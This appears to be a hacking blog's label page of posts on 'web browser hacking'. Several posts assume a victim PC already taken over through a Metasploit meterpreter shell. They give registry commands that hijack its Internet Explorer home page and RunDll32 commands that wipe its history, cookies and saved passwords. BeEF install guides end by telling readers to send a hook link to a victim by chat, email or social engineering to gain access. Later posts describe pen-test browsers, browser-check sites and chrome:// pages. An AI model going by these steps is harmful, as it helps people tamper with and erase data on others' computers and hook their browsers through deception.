Showing posts with label web Browser Hacking. Show all posts
Showing posts with label web Browser Hacking. Show all posts

Hack Internet Explorer in Remote PC set your desired Home page

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Set Your Desired Website as Home Page

Type the following commands in the command prompt. (Enter the web address of the desired website; here we have taken an example of http://www.hackingarticles.in/)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.hackingarticles.in/" /F


Now, open the internet explorer in the remote victim PC, we would see that the chosen webpage will open as the homepage.


Stylish Home Page

(Use this link www.shinysearch.com  to put your own desired text.)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.shinysearch.com/myhome.php?theme=matrix&ltext=www.hackingarticles.in" /F


Check out this screenshot seen after opening the internet explorer.


Insert Your Image in Google Background

Type the following command)
(Take the reference of the link   http://www.hackingarticles.in/insert-image-google-search/   to put your own desired image in the background)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.shinysearch.com/myhome.php?style=mypic_full&img=b26b7e0e353d82b7642905e68ca5476e&ltext=Your%20Name" /F


Open the internet explorer; we would get the image in the Google search background.

Playing with internet explorer in Remotely Hacked PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Delete Temporary Internet Files

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8


Delete Cookies

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2


Delete History

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1


Delete From Data

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16


Delete Passwords

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32


Delete All

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255


Delete All + files and settings stored by Add-ons

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351

How to Install BeEF in Windows PC

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing.

First download ruby for windows from here
Install it in C:\ folder and make sure you select all the options. So Ruby is installed now.


After installing Ruby, you need to download the SQLite dll from here
Now extract the SQLite zip file on the Ruby193\bin folder:


Now you need to download the DevKit-tdm-32-4.5.2-20111229-1559-sfx.exe’ from here
Now extract the DevKit-tdm-32-4.5.2-20111229-1559-sfx.exe’ file on the C:\ folder

Open cmd prompt and go to ‘Devkit’ path and we need to run "ruby dk.rb init


Now we need to run "ruby dk.rb install’


Now a few other steps: - ruby dk.rb review (checks things are ok) –
gem install rdiscount --platform=ruby (you should see the message "Temporarily enhancing PATH to include DevKit...")


Now you need to download the BeEF Project from here
Now open the BeEF file ‘beefproject-beef-beef-0.4.3.7-0-g69c59bb’ and extract the files to C:\beef

Open cmd prompt go to the BeEF path and type the following:
 ruby install

Now type the below commands one by one

gem install bundler
bundle install
(You will see something similar to this)


Now Type "ruby beef" to start beef.
 Of course you will need your Windows Firewall to allow that application :)



BeEF is installed successfully. Now go to http://127.0.0.1:3000/ui/panel and check if it is available 
http://192.168.1.2:3000/ui/panel (beef is the user name and password)

Send the link http://192.168.1.2:3000/demos/basic.html to the victim via chat or email or any social engineering technique to the victim.

Hcon Security Testing Framework

HconSTF is Open Source Penetration Testing Framework based on different browser technologies, which helps any security professional to assists in the Penetration testing or vulnerability scanning assessments. contains web tools which are powerful in doing xss(cross site scripting), Sql injection, siXSS, CSRF, Trace XSS, RFI, LFI, etc. Even useful to anybody interested in information security domain - students, Security Professionals, web developers, manual vulnerability assessments and much more.

Features
  • Categorized and comprehensive toolset
  • Contains hundreds of tools and features and script for different tasks like SQLi, XSS,Dorks, OSINT to name a few
  • HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
  • Each and every option is configured for penetration testing and Vulnerability assessments
  • Specially configured and enhanced for gaining easy & solid anonymity
  • Works for web app testing assessments specially for owasp top 10
  • Easy to use & collaborative Operating System like interface
  • Multi-Language support (feature in heavy development translators needed)


Sandcat Browser - Pen-Test Oriented Web Browser

Sandcat Browser is a freeware portable pen-test oriented multi-tabbed web browser with extensions support developed by the Syhunt team, the same creators of the Syhunt Web Application Security Scanner. The Sandcat Browser is built on top of Chromium, the same engine that powers the Google Chrome browser, and uses the Lua language to provide extensions and scripting support.

Sandcat Browser includes the following pen-test oriented features:
  • Live HTTP Headers
  • Request Editor Extension
  • Fuzzer extension with multiple modes and support for filters
  • JavaScript Executor extension -- allows you to load and run external JavaScript files
  • Lua Executor extension -- allows you to load and run external Lua scripts
  • Syhunt Gelo
  • HTTP Brute Force, CGI Scanner scripts and more



BeEF (Browser Exploitation Framework) Tutorial in BackTrack (Part 1)

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. The Browser Exploitation Framework (BeEF) is a powerful professional security tool.

BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing. BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

How to Install Browser Exploitation Framework in BackTrack

First Open Your backtrack and Follow these path
Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework>BeEF Installer


Now Beef is Successfully Install in your PC


How to use Browser Exploitation Framework 

Open your backtrack and Follow these path
Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework>BeEF



Then copied the URL and launched it in the browser (this is my URL based on the IP of my virtual box machine yours will be different)

http://192.168.1.3:3000/ui/panel (beef is the user name and password)


Send the link http://192.168.1.3:3000/demos/basic.html to the victim via chat or email or any social engineering technique to the victim


Now you can get access of victim pc



How to Check Your Browser Security

Qualys BrowserCheck 
Qualys BrowserCheck is a free tool that scans your browser and its plugins to find potential vulnerabilities and security holes and help you fix them.





Browser Scope
Browserscope is a community-driven project for profiling web browsers. The goals are to foster innovation by tracking browser functionality and to be a resource for web developers.




Panopticlick
Panopticlick checks if your browser’s configuration is unique. The more unique your browser, the less easily it could be tracked. Web tracking is a privacy risk for users.

Most Useful Google Chrome Browser chrome:// Commands

chrome://flags
From here you can enable some of the experimental features that are hidden in the google Chrome browser. Please note that as mentioned on this page, since these are experimental, these might not work as expected and might cause issues. Enable these features and use it at your own risk.



 chrome://dns
This displays the list of hostnames for which the browser will prefetch the DNS records.


chrome://downloads
This is also available from the Menu -> Downloads. Short cut key is Ctrl+J


chrome://extensions
This is also available from the Menu -> Tools -> Extensions


chrome://bookmarks
This is also available from the Menu -> Bookmarks -> Bookmark Manager. Short cut key is Ctrl+Shift+O


chrome://history
This is also availble from the Menu -> History. Short cut key is Ctrl+H


chrome://memory
This will redirect to “chrome://memory-redirect/”. This will display the memory used by Google chrome browser, and all other browsers running on the system (including firefox).
This also display all the process related to browser with their PID, process name, and the memory it takes.


chrome://net-internals
This displays all networking related information. Use this to capture network events generated by the browser. You can also export this data. You can view DNS host resolver cache.
One of the important feature in this feature is “Test”. If a URL failed to load, you can go to “chrome://net-internals” -> click on “Tests” tab -> type that URL which failed, and click on “Start Test”, which will do some test and report you why that URL failed.

chrome://quota-internals
This gives information about the disk space quote used by the browser, including the break down of how much space the individual websites took under temporary files.


chrome://sessions
This displays the number of sessions and magic list that are currently running.



chrome://settings
This is also available from the Menu -> Options (on Windows), and Menu -> Preferences (on Linux). From here you can control various browser related settings.


chrome://sync-internals
This gives information about the chrome sync feature, including the Sync URL used by google, and sync statistics.

Finally, to view all the available chrome:// commands, type chrome://about/ in your chrome browser URL as shown below.